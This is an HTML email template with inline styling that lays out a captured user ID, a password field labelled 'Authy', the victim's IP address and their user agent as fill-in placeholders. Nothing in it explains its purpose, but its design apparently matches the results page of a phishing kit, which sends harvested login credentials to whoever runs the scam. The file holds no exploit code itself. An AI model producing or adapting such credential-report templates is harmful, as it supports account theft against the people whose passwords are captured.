<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <style>
            * {
                margin: 0;
                padding: 0;

                font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            }
            .container {
                width: 100%;
                max-width: 600px;
                margin: 0 auto;
                padding: 2rem;
            }

            .dotted {
                height: 1px;
                margin: 2rem 0;
                border-bottom: 2px dashed #000;
            }

            .flex {
                display: flex;
                align-items: center;
                margin: .5rem;
            }

            .title {
                font-size: 1rem;
                font-weight: 500;
                margin-right: .8rem;
            }

            .content {
                flex: 1;
                font-size: 1rem;
                font-weight: 600;
            }
        </style>
    </head>
    <body>
        <div class="container">
            <div class="dotted"></div>
            <div class="flex">
                <p class="title">User ID:</p>
                <p class="content">{{email}}</p>
            </div>

            <div class="flex">
                <p class="title">Authy:</p>
                <p class="content">{{password}}</p>
            </div>

            <div class="dotted"></div>

            <div class="flex">
                <p class="title">IP Address:</p>
                <p class="content">{{ip}}</p>
            </div>

            <div class="flex">
                <p class="title">User Agent:</p>
                <p class="content">{{agent}}</p>
            </div>
        </div>
    </body>
</html>